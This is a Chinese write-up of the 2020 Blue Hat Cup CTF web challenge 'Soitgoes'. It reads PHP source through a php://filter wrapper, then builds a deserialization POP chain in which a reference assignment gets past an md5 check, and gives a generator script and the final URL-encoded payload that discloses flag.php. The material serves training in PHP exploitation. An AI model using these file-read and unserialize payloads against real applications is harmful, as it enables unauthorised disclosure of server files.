[蓝帽杯2020第四届 线上赛]Soitgoes

题目
php反序列化，pop构造，常规题
过程
1.index.php页面右键查看源码，感觉要用php伪协议去读try.php

图片.png

2.?file=php://filter/read=convert.base64-encode/resource=这次没有过滤，直接读到
index.php

图片.png

try.php

alize = $alize;
    }
    public function __destruct(){
        $this->alize->getFlag();
    }
}

class Flag{
    public $f;
    public $t1;
    public $t2;

    function __construct($file){
        $this->f = $file;
        $this->t1 = $this->t2 = md5(rand(1,10000));
    }

    public function getFlag(){
        $this->t2 = md5(rand(1,10000));
        echo $this->t1;
        echo $this->t2;
        if($this->t1 === $this->t2)
        {
            if(isset($this->f)){
                echo @highlight_file($this->f,true);
            }
        }
    }
}

3.寻找pop链
Seri类中的魔法函数__destruct()使用getFlag()方法，Flag类中的getFlag()定义该方法。
构造一个Flag类型的变量，传入的参数为flag.php。$Flag=new Flag('flag.php');
构造一个Seri类型的变量，传入的参赛为$Flag，这样销毁$Flag的时候，就会调用__destruct()。$test=new Seri($Flag)
在getFlag()方法中还有一个md5判断，要使t1，t2值相等才可，其实不用。直接使用php的引用赋值即可。

a=1;
b=&a;
a=a+1;

那末最后b得值也会变为2，因为b是引用赋值。所以最终$Flag->t1 = &$Flag->t2;
最终payload

alize = $alize;
    }
    public function __destruct(){
        $this->alize->getFlag();
    }
}

class Flag{
    public $f;
    public $t1;
    public $t2;

    function __construct($file){
        $this->f = $file;
        $this->t1 = $this->t2 = md5(rand(1,10000));
    }

    public function getFlag(){
        $this->t2 = md5(rand(1,10000));
        echo $this->t1;
        echo $this->t2;
        if($this->t1 === $this->t2)
        {
            if(isset($this->f)){
                echo @highlight_file($this->f,true);
            }
        }
    }
}
$Flag=new Flag('flag.php');
$Flag->t1 = &$Flag->t2;
$test = new Seri($Flag);
echo urlencode(serialize($test));
?>

图片.png

O%3A4%3A%22Seri%22%3A1%3A%7Bs%3A5%3A%22alize%22%3BO%3A4%3A%22Flag%22%3A3%3A%7Bs%3A1%3A%22f%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A2%3A%22t1%22%3Bs%3A32%3A%224a2ddf148c5a9c42151a529e8cbdcc06%22%3Bs%3A2%3A%22t2%22%3BR%3A4%3B%7D%7D0a49e3c3a03ebde64f85c0bacd8a08e20a49e3c3a03ebde64f85c0bacd8a08e2
4.只是这样还不行，观察index.php，反序列化后传给p。
最终payload：

url/?file=try.php&p=O%3A4%3A"Seri"%3A1%3A{s%3A5%3A"alize"%3BO%3A4%3A"Flag"%3A3%3A{s%3A1%3A"f"%3Bs%3A8%3A"flag.php"%3Bs%3A2%3A"t1"%3Bs%3A32%3A"8e98d81f8217304975ccb23337bb5761"%3Bs%3A2%3A"t2"%3BR%3A4%3B}}6e17a5fd135fcaf4b49f2860c2474c7c6e17a5fd135fcaf4b49f2860c2474c7c